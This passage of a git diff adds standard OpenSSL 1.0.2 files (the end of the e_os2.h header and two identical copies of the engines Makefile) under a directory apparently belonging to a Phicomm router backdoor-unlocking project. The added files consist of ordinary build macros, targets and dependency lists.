+#  define OPENSSL_UNISTD_IO OPENSSL_UNISTD
+#  define OPENSSL_DECLARE_EXIT  /* declared in unistd.h */
+# endif
+
+/*-
+ * Definitions of OPENSSL_GLOBAL and OPENSSL_EXTERN, to define and declare
+ * certain global symbols that, with some compilers under VMS, have to be
+ * defined and declared explicitely with globaldef and globalref.
+ * Definitions of OPENSSL_EXPORT and OPENSSL_IMPORT, to define and declare
+ * DLL exports and imports for compilers under Win32.  These are a little
+ * more complicated to use.  Basically, for any library that exports some
+ * global variables, the following code must be present in the header file
+ * that declares them, before OPENSSL_EXTERN is used:
+ *
+ * #ifdef SOME_BUILD_FLAG_MACRO
+ * # undef OPENSSL_EXTERN
+ * # define OPENSSL_EXTERN OPENSSL_EXPORT
+ * #endif
+ *
+ * The default is to have OPENSSL_EXPORT, OPENSSL_IMPORT and OPENSSL_GLOBAL
+ * have some generally sensible values, and for OPENSSL_EXTERN to have the
+ * value OPENSSL_IMPORT.
+ */
+
+# if defined(OPENSSL_SYS_VMS_NODECC)
+#  define OPENSSL_EXPORT globalref
+#  define OPENSSL_IMPORT globalref
+#  define OPENSSL_GLOBAL globaldef
+# elif defined(OPENSSL_SYS_WINDOWS) && defined(OPENSSL_OPT_WINDLL)
+#  define OPENSSL_EXPORT extern __declspec(dllexport)
+#  define OPENSSL_IMPORT extern __declspec(dllimport)
+#  define OPENSSL_GLOBAL
+# else
+#  define OPENSSL_EXPORT extern
+#  define OPENSSL_IMPORT extern
+#  define OPENSSL_GLOBAL
+# endif
+# define OPENSSL_EXTERN OPENSSL_IMPORT
+
+/*-
+ * Macros to allow global variables to be reached through function calls when
+ * required (if a shared library version requires it, for example.
+ * The way it's done allows definitions like this:
+ *
+ *      // in foobar.c
+ *      OPENSSL_IMPLEMENT_GLOBAL(int,foobar,0)
+ *      // in foobar.h
+ *      OPENSSL_DECLARE_GLOBAL(int,foobar);
+ *      #define foobar OPENSSL_GLOBAL_REF(foobar)
+ */
+# ifdef OPENSSL_EXPORT_VAR_AS_FUNCTION
+#  define OPENSSL_IMPLEMENT_GLOBAL(type,name,value)                      \
+        type *_shadow_##name(void)                                      \
+        { static type _hide_##name=value; return &_hide_##name; }
+#  define OPENSSL_DECLARE_GLOBAL(type,name) type *_shadow_##name(void)
+#  define OPENSSL_GLOBAL_REF(name) (*(_shadow_##name()))
+# else
+#  define OPENSSL_IMPLEMENT_GLOBAL(type,name,value) OPENSSL_GLOBAL type _shadow_##name=value;
+#  define OPENSSL_DECLARE_GLOBAL(type,name) OPENSSL_EXPORT type _shadow_##name
+#  define OPENSSL_GLOBAL_REF(name) _shadow_##name
+# endif
+
+# if defined(OPENSSL_SYS_MACINTOSH_CLASSIC) && macintosh==1 && !defined(MAC_OS_GUSI_SOURCE)
+#  define ossl_ssize_t long
+# endif
+
+# ifdef OPENSSL_SYS_MSDOS
+#  define ossl_ssize_t long
+# endif
+
+# if defined(NeXT) || defined(OPENSSL_SYS_NEWS4) || defined(OPENSSL_SYS_SUNOS)
+#  define ssize_t int
+# endif
+
+# if defined(__ultrix) && !defined(ssize_t)
+#  define ossl_ssize_t int
+# endif
+
+# ifndef ossl_ssize_t
+#  define ossl_ssize_t ssize_t
+# endif
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/Makefile
new file mode 100644
index 0000000..da6c875
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/Makefile
@@ -0,0 +1,335 @@
+#
+# OpenSSL/engines/Makefile
+#
+
+DIR=	engines
+TOP=	..
+CC=	cc
+INCLUDES= -I../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+ENGDIRS= ccgost
+
+RECURSIVE_MAKE=	[ -z "$(ENGDIRS)" ] || for i in $(ENGDIRS) ; do \
+		    (cd $$i && echo "making $$target in $(DIR)/$$i..." && \
+		    $(MAKE) -e TOP=../.. DIR=$$i $$target ) || exit 1; \
+		done;
+
+PEX_LIBS=
+EX_LIBS=
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile engines.com install.com engine_vector.mar
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBNAMES= 4758cca aep atalla cswift gmp chil nuron sureware ubsec padlock capi
+
+LIBSRC=	e_4758cca.c \
+	e_aep.c \
+	e_atalla.c \
+	e_cswift.c \
+	e_gmp.c \
+	e_chil.c \
+	e_nuron.c \
+	e_sureware.c \
+	e_ubsec.c \
+	e_padlock.c \
+	e_capi.c
+LIBOBJ= e_4758cca.o \
+	e_aep.o \
+	e_atalla.o \
+	e_cswift.o \
+	e_gmp.o \
+	e_chil.o \
+	e_nuron.o \
+	e_sureware.o \
+	e_ubsec.o \
+	e_padlock.o \
+	e_capi.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= 
+HEADER=	e_4758cca_err.c e_4758cca_err.h \
+	e_aep_err.c e_aep_err.h \
+	e_atalla_err.c e_atalla_err.h \
+	e_cswift_err.c e_cswift_err.h \
+	e_gmp_err.c e_gmp_err.h \
+	e_chil_err.c e_chil_err.h \
+	e_nuron_err.c e_nuron_err.h \
+	e_sureware_err.c e_sureware_err.h \
+	e_ubsec_err.c e_ubsec_err.h \
+	e_capi_err.c e_capi_err.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ..; $(MAKE) DIRS=$(DIR) all)
+
+all:	lib subdirs
+
+lib:	$(LIBOBJ)
+	@if [ -n "$(SHARED_LIBS)" ]; then \
+		set -e; \
+		for l in $(LIBNAMES); do \
+			$(MAKE) -f ../Makefile.shared -e \
+				LIBNAME=$$l LIBEXTRAS=e_$$l.o \
+				LIBDEPS='-L.. -lcrypto $(EX_LIBS)' \
+				link_o.$(SHLIB_TARGET); \
+		done; \
+	else \
+		$(AR) $(LIB) $(LIBOBJ); \
+		$(RANLIB) $(LIB) || echo Never mind.; \
+	fi; \
+	touch lib
+
+subdirs:
+	echo $(EDIRS)
+	@target=all; $(RECURSIVE_MAKE)
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+	@target=files; $(RECURSIVE_MAKE)
+
+links:
+	@target=links; $(RECURSIVE_MAKE)
+
+# XXXXX This currently only works on systems that use .so as suffix
+# for shared libraries as well as for Cygwin which uses the
+# dlfcn_name_converter and therefore stores the engines with .so suffix, too.
+# XXXXX This was extended to HP-UX dl targets, which use .sl suffix.
+# XXXXX This was extended to mingw targets, which use eay32.dll suffix without lib as prefix.
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@if [ -n "$(SHARED_LIBS)" ]; then \
+		set -e; \
+		$(PERL) $(TOP)/util/mkdir-p.pl $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines; \
+		for l in $(LIBNAMES); do \
+			( echo installing $$l; \
+			  pfx=lib; \
+			  if expr "$(PLATFORM)" : "Cygwin" >/dev/null; then \
+				sfx=".so"; \
+				cp cyg$$l.dll $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines/$$pfx$$l$$sfx.new; \
+			  else \
+				case "$(CFLAGS)" in \
+				*DSO_BEOS*)	sfx=".so";;	\
+				*DSO_DLFCN*)	sfx=`expr "$(SHLIB_EXT)" : '.*\(\.[a-z][a-z]*\)' \| ".so"`;;	\
+				*DSO_DL*)	sfx=".sl";;	\
+				*DSO_WIN32*)	sfx="eay32.dll"; pfx=;;	\
+				*)		sfx=".bad";;	\
+				esac; \
+				cp $$pfx$$l$$sfx $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines/$$pfx$$l$$sfx.new; \
+			  fi; \
+			  chmod 555 $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines/$$pfx$$l$$sfx.new; \
+			  mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines/$$pfx$$l$$sfx.new $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines/$$pfx$$l$$sfx ); \
+		done; \
+	fi
+	@target=install; $(RECURSIVE_MAKE)
+
+tags:
+	ctags $(SRC)
+
+errors:
+	set -e; for l in $(LIBNAMES); do \
+		$(PERL) ../util/mkerr.pl -conf e_$$l.ec \
+			-nostatic -staticloader -write e_$$l.c; \
+	done
+	(cd ccgost; $(MAKE) PERL=$(PERL) errors)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+	@target=lint; $(RECURSIVE_MAKE)
+
+depend:
+	@if [ -z "$(THIS)" ]; then \
+	    $(MAKE) -f $(TOP)/Makefile reflect THIS=$@; \
+	fi
+	@[ -z "$(THIS)" ] || $(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+	@[ -z "$(THIS)" ] || (set -e; target=depend; $(RECURSIVE_MAKE) )
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+	@target=dclean; $(RECURSIVE_MAKE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+	@target=clean; $(RECURSIVE_MAKE)
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+e_4758cca.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+e_4758cca.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+e_4758cca.o: ../include/openssl/crypto.h ../include/openssl/dso.h
+e_4758cca.o: ../include/openssl/e_os2.h ../include/openssl/ec.h
+e_4758cca.o: ../include/openssl/ecdh.h ../include/openssl/ecdsa.h
+e_4758cca.o: ../include/openssl/engine.h ../include/openssl/err.h
+e_4758cca.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+e_4758cca.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+e_4758cca.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+e_4758cca.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+e_4758cca.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+e_4758cca.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+e_4758cca.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+e_4758cca.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+e_4758cca.o: e_4758cca.c e_4758cca_err.c e_4758cca_err.h
+e_4758cca.o: vendor_defns/hw_4758_cca.h
+e_aep.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+e_aep.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+e_aep.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+e_aep.o: ../include/openssl/dsa.h ../include/openssl/dso.h
+e_aep.o: ../include/openssl/e_os2.h ../include/openssl/ec.h
+e_aep.o: ../include/openssl/ecdh.h ../include/openssl/ecdsa.h
+e_aep.o: ../include/openssl/engine.h ../include/openssl/err.h
+e_aep.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+e_aep.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+e_aep.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+e_aep.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+e_aep.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+e_aep.o: ../include/openssl/sha.h ../include/openssl/stack.h
+e_aep.o: ../include/openssl/symhacks.h ../include/openssl/x509.h
+e_aep.o: ../include/openssl/x509_vfy.h e_aep.c e_aep_err.c e_aep_err.h
+e_aep.o: vendor_defns/aep.h
+e_atalla.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+e_atalla.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+e_atalla.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+e_atalla.o: ../include/openssl/dsa.h ../include/openssl/dso.h
+e_atalla.o: ../include/openssl/e_os2.h ../include/openssl/ec.h
+e_atalla.o: ../include/openssl/ecdh.h ../include/openssl/ecdsa.h
+e_atalla.o: ../include/openssl/engine.h ../include/openssl/err.h
+e_atalla.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+e_atalla.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+e_atalla.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+e_atalla.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+e_atalla.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+e_atalla.o: ../include/openssl/sha.h ../include/openssl/stack.h
+e_atalla.o: ../include/openssl/symhacks.h ../include/openssl/x509.h
+e_atalla.o: ../include/openssl/x509_vfy.h e_atalla.c e_atalla_err.c
+e_atalla.o: e_atalla_err.h vendor_defns/atalla.h
+e_capi.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+e_capi.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+e_capi.o: ../include/openssl/e_os2.h ../include/openssl/ec.h
+e_capi.o: ../include/openssl/ecdh.h ../include/openssl/ecdsa.h
+e_capi.o: ../include/openssl/engine.h ../include/openssl/evp.h
+e_capi.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+e_capi.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+e_capi.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+e_capi.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+e_capi.o: ../include/openssl/sha.h ../include/openssl/stack.h
+e_capi.o: ../include/openssl/symhacks.h ../include/openssl/x509.h
+e_capi.o: ../include/openssl/x509_vfy.h e_capi.c
+e_chil.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+e_chil.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+e_chil.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+e_chil.o: ../include/openssl/dso.h ../include/openssl/e_os2.h
+e_chil.o: ../include/openssl/ec.h ../include/openssl/ecdh.h
+e_chil.o: ../include/openssl/ecdsa.h ../include/openssl/engine.h
+e_chil.o: ../include/openssl/err.h ../include/openssl/evp.h
+e_chil.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+e_chil.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+e_chil.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+e_chil.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+e_chil.o: ../include/openssl/pkcs7.h ../include/openssl/rand.h
+e_chil.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+e_chil.o: ../include/openssl/sha.h ../include/openssl/stack.h
+e_chil.o: ../include/openssl/symhacks.h ../include/openssl/ui.h
+e_chil.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h e_chil.c
+e_chil.o: e_chil_err.c e_chil_err.h vendor_defns/hwcryptohook.h
+e_cswift.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+e_cswift.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+e_cswift.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+e_cswift.o: ../include/openssl/dsa.h ../include/openssl/dso.h
+e_cswift.o: ../include/openssl/e_os2.h ../include/openssl/ec.h
+e_cswift.o: ../include/openssl/ecdh.h ../include/openssl/ecdsa.h
+e_cswift.o: ../include/openssl/engine.h ../include/openssl/err.h
+e_cswift.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+e_cswift.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+e_cswift.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+e_cswift.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+e_cswift.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+e_cswift.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+e_cswift.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+e_cswift.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h e_cswift.c
+e_cswift.o: e_cswift_err.c e_cswift_err.h vendor_defns/cswift.h
+e_gmp.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+e_gmp.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+e_gmp.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+e_gmp.o: ../include/openssl/ec.h ../include/openssl/ecdh.h
+e_gmp.o: ../include/openssl/ecdsa.h ../include/openssl/engine.h
+e_gmp.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+e_gmp.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+e_gmp.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+e_gmp.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+e_gmp.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+e_gmp.o: ../include/openssl/sha.h ../include/openssl/stack.h
+e_gmp.o: ../include/openssl/symhacks.h ../include/openssl/x509.h
+e_gmp.o: ../include/openssl/x509_vfy.h e_gmp.c
+e_nuron.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+e_nuron.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+e_nuron.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+e_nuron.o: ../include/openssl/dsa.h ../include/openssl/dso.h
+e_nuron.o: ../include/openssl/e_os2.h ../include/openssl/ec.h
+e_nuron.o: ../include/openssl/ecdh.h ../include/openssl/ecdsa.h
+e_nuron.o: ../include/openssl/engine.h ../include/openssl/err.h
+e_nuron.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+e_nuron.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+e_nuron.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+e_nuron.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+e_nuron.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+e_nuron.o: ../include/openssl/sha.h ../include/openssl/stack.h
+e_nuron.o: ../include/openssl/symhacks.h ../include/openssl/x509.h
+e_nuron.o: ../include/openssl/x509_vfy.h e_nuron.c e_nuron_err.c e_nuron_err.h
+e_padlock.o: ../include/openssl/aes.h ../include/openssl/asn1.h
+e_padlock.o: ../include/openssl/bio.h ../include/openssl/buffer.h
+e_padlock.o: ../include/openssl/crypto.h ../include/openssl/dso.h
+e_padlock.o: ../include/openssl/e_os2.h ../include/openssl/ec.h
+e_padlock.o: ../include/openssl/ecdh.h ../include/openssl/ecdsa.h
+e_padlock.o: ../include/openssl/engine.h ../include/openssl/err.h
+e_padlock.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+e_padlock.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+e_padlock.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+e_padlock.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+e_padlock.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+e_padlock.o: ../include/openssl/sha.h ../include/openssl/stack.h
+e_padlock.o: ../include/openssl/symhacks.h ../include/openssl/x509.h
+e_padlock.o: ../include/openssl/x509_vfy.h e_padlock.c
+e_sureware.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+e_sureware.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+e_sureware.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+e_sureware.o: ../include/openssl/dsa.h ../include/openssl/dso.h
+e_sureware.o: ../include/openssl/e_os2.h ../include/openssl/ec.h
+e_sureware.o: ../include/openssl/ecdh.h ../include/openssl/ecdsa.h
+e_sureware.o: ../include/openssl/engine.h ../include/openssl/err.h
+e_sureware.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+e_sureware.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+e_sureware.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+e_sureware.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+e_sureware.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+e_sureware.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+e_sureware.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+e_sureware.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+e_sureware.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+e_sureware.o: e_sureware.c e_sureware_err.c e_sureware_err.h
+e_sureware.o: vendor_defns/sureware.h
+e_ubsec.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+e_ubsec.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+e_ubsec.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+e_ubsec.o: ../include/openssl/dsa.h ../include/openssl/dso.h
+e_ubsec.o: ../include/openssl/e_os2.h ../include/openssl/ec.h
+e_ubsec.o: ../include/openssl/ecdh.h ../include/openssl/ecdsa.h
+e_ubsec.o: ../include/openssl/engine.h ../include/openssl/err.h
+e_ubsec.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+e_ubsec.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+e_ubsec.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+e_ubsec.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+e_ubsec.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+e_ubsec.o: ../include/openssl/sha.h ../include/openssl/stack.h
+e_ubsec.o: ../include/openssl/symhacks.h ../include/openssl/x509.h
+e_ubsec.o: ../include/openssl/x509_vfy.h e_ubsec.c e_ubsec_err.c e_ubsec_err.h
+e_ubsec.o: vendor_defns/hw_ubsec.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/Makefile.save
new file mode 100644
index 0000000..da6c875
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/Makefile.save
@@ -0,0 +1,335 @@
+#
+# OpenSSL/engines/Makefile
+#
+
+DIR=	engines
+TOP=	..
+CC=	cc
+INCLUDES= -I../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+ENGDIRS= ccgost
+
+RECURSIVE_MAKE=	[ -z "$(ENGDIRS)" ] || for i in $(ENGDIRS) ; do \
+		    (cd $$i && echo "making $$target in $(DIR)/$$i..." && \
+		    $(MAKE) -e TOP=../.. DIR=$$i $$target ) || exit 1; \
+		done;
+
+PEX_LIBS=
+EX_LIBS=
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile engines.com install.com engine_vector.mar
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBNAMES= 4758cca aep atalla cswift gmp chil nuron sureware ubsec padlock capi
+
+LIBSRC=	e_4758cca.c \
+	e_aep.c \
+	e_atalla.c \
+	e_cswift.c \
+	e_gmp.c \
+	e_chil.c \
+	e_nuron.c \
+	e_sureware.c \
+	e_ubsec.c \
+	e_padlock.c \
+	e_capi.c
+LIBOBJ= e_4758cca.o \
+	e_aep.o \
+	e_atalla.o \
+	e_cswift.o \
+	e_gmp.o \
+	e_chil.o \
+	e_nuron.o \
+	e_sureware.o \
+	e_ubsec.o \
+	e_padlock.o \
+	e_capi.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= 
+HEADER=	e_4758cca_err.c e_4758cca_err.h \
+	e_aep_err.c e_aep_err.h \
+	e_atalla_err.c e_atalla_err.h \
+	e_cswift_err.c e_cswift_err.h \
+	e_gmp_err.c e_gmp_err.h \
+	e_chil_err.c e_chil_err.h \
+	e_nuron_err.c e_nuron_err.h \
+	e_sureware_err.c e_sureware_err.h \
+	e_ubsec_err.c e_ubsec_err.h \
+	e_capi_err.c e_capi_err.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ..; $(MAKE) DIRS=$(DIR) all)
+
+all:	lib subdirs
+
+lib:	$(LIBOBJ)
+	@if [ -n "$(SHARED_LIBS)" ]; then \
+		set -e; \
+		for l in $(LIBNAMES); do \
+			$(MAKE) -f ../Makefile.shared -e \
+				LIBNAME=$$l LIBEXTRAS=e_$$l.o \
+				LIBDEPS='-L.. -lcrypto $(EX_LIBS)' \
+				link_o.$(SHLIB_TARGET); \
+		done; \
+	else \
+		$(AR) $(LIB) $(LIBOBJ); \
+		$(RANLIB) $(LIB) || echo Never mind.; \
+	fi; \
+	touch lib
+
+subdirs:
+	echo $(EDIRS)
+	@target=all; $(RECURSIVE_MAKE)
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+	@target=files; $(RECURSIVE_MAKE)
+
+links:
+	@target=links; $(RECURSIVE_MAKE)
+
+# XXXXX This currently only works on systems that use .so as suffix
+# for shared libraries as well as for Cygwin which uses the
+# dlfcn_name_converter and therefore stores the engines with .so suffix, too.
+# XXXXX This was extended to HP-UX dl targets, which use .sl suffix.
+# XXXXX This was extended to mingw targets, which use eay32.dll suffix without lib as prefix.
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@if [ -n "$(SHARED_LIBS)" ]; then \
+		set -e; \
+		$(PERL) $(TOP)/util/mkdir-p.pl $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines; \
+		for l in $(LIBNAMES); do \
+			( echo installing $$l; \
+			  pfx=lib; \
+			  if expr "$(PLATFORM)" : "Cygwin" >/dev/null; then \
+				sfx=".so"; \
+				cp cyg$$l.dll $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines/$$pfx$$l$$sfx.new; \
+			  else \
+				case "$(CFLAGS)" in \
+				*DSO_BEOS*)	sfx=".so";;	\
+				*DSO_DLFCN*)	sfx=`expr "$(SHLIB_EXT)" : '.*\(\.[a-z][a-z]*\)' \| ".so"`;;	\
+				*DSO_DL*)	sfx=".sl";;	\
+				*DSO_WIN32*)	sfx="eay32.dll"; pfx=;;	\
+				*)		sfx=".bad";;	\
+				esac; \
+				cp $$pfx$$l$$sfx $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines/$$pfx$$l$$sfx.new; \
+			  fi; \
+			  chmod 555 $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines/$$pfx$$l$$sfx.new; \
+			  mv -f $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines/$$pfx$$l$$sfx.new $(INSTALL_PREFIX)$(INSTALLTOP)/$(LIBDIR)/engines/$$pfx$$l$$sfx ); \
+		done; \
+	fi
+	@target=install; $(RECURSIVE_MAKE)
+
+tags:
+	ctags $(SRC)
+
+errors:
+	set -e; for l in $(LIBNAMES); do \
+		$(PERL) ../util/mkerr.pl -conf e_$$l.ec \
+			-nostatic -staticloader -write e_$$l.c; \
+	done
+	(cd ccgost; $(MAKE) PERL=$(PERL) errors)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+	@target=lint; $(RECURSIVE_MAKE)
+
+depend:
+	@if [ -z "$(THIS)" ]; then \
+	    $(MAKE) -f $(TOP)/Makefile reflect THIS=$@; \
+	fi
+	@[ -z "$(THIS)" ] || $(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+	@[ -z "$(THIS)" ] || (set -e; target=depend; $(RECURSIVE_MAKE) )
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+	@target=dclean; $(RECURSIVE_MAKE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+	@target=clean; $(RECURSIVE_MAKE)
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+e_4758cca.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+e_4758cca.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+e_4758cca.o: ../include/openssl/crypto.h ../include/openssl/dso.h
+e_4758cca.o: ../include/openssl/e_os2.h ../include/openssl/ec.h
+e_4758cca.o: ../include/openssl/ecdh.h ../include/openssl/ecdsa.h
+e_4758cca.o: ../include/openssl/engine.h ../include/openssl/err.h
+e_4758cca.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+e_4758cca.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+e_4758cca.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+e_4758cca.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+e_4758cca.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+e_4758cca.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+e_4758cca.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+e_4758cca.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+e_4758cca.o: e_4758cca.c e_4758cca_err.c e_4758cca_err.h
+e_4758cca.o: vendor_defns/hw_4758_cca.h
+e_aep.o: ../include/openssl/asn1.h ../include/openssl/bio.h
+e_aep.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+e_aep.o: ../include/openssl/crypto.h ../include/openssl/dh.h
+e_aep.o: ../include/openssl/dsa.h ../include/openssl/dso.h
+e_aep.o: ../include/openssl/e_os2.h ../include/openssl/ec.h
+e_aep.o: ../include/openssl/ecdh.h ../include/openssl/ecdsa.h
+e_aep.o: ../include/openssl/engine.h ../include/openssl/err.h
+e_aep.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+e_aep.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+e_aep.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
